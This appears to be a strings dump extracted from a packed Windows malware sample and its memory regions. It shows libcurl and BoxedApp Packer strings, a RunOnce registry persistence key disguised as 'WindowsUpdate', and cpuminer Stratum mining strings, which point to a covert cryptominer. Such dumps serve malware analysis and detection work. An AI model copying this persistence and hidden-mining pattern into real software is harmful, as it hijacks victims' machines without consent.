ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
PTF.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tPTF.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b<fd:%d>
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: hXXp://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
<BoxedAppVar:OldCmdLine>
<ExeDir>
<ExeDir>\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
<ExeDir>\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
hXXp://sourceware.org/pthreads-win32/
<ExeDir>\zlib1.dll
For more information visit hXXp://VVV.zlib.net/

winmgr.exe_2040_rwx_03FB3000_00002000:

Error Reading Key
3818273
Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsUpdate
48727194728194
Software\Microsoft\Windows\CurrentVersion\ime
Error Opening Key
MSVCRT.dll
KERNEL32.dll
CreatePipe
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
ADVAPI32.DLL
ShellExecuteExA
SHELL32.DLL
WINMM.DLL

winmgr.exe_2040_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

cvtres.exe_2276_rwx_00400000_00177000:

.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
hXXp://
hXXps://
stratum tcp://
hXXp://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
hXXp://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: hXXp://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
<p.uH
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
